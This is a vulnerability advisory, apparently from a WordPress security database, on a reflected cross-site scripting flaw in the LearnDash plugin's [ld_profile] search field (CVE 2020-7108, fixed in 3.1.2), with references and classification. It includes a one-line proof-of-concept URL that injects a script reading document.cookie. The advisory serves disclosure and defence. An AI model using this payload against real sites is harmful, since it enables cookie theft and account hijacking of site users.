LearnDash < 3.1.2 - Reflected Cross Site Scripting (XSS) issue on the [ld_profile] search field.



Description
Reflected Cross Site Scripting (XSS) issue on the [ld_profile] search field.

First reported to Learndash on January 14, 2020, and update 3.1.2 to fix it was released same day.

This report is based on an email LearnDash sent out to their users on January 14, 2020.
Proof of Concept
From the Original Researcher (Jinson Varghese Behanan, @JinsonCyberSec):

[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Affects Plugin

fixed in version 3.1.2

References

CVE 2020-7108
URL https://learndash.releasenotes.io/release/uCskc-version-312
URL https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
URL https://www.jinsonvarghese.com/reflected-xss-in-learndash-wordpress-plugin/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Jinson Varghese Behanan (@JinsonCyberSec)
Submitter Andrew Wilder
Submitter Website https://www.nerdpress.net
Submitter Twitter @nerdpress
Views 5072
Verified No
WPVDB ID 10026

Timeline

Publicly Published 2020-01-15 (3 months ago)
Added 2020-01-15 (3 months ago)
Last Updated 2020-01-17 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin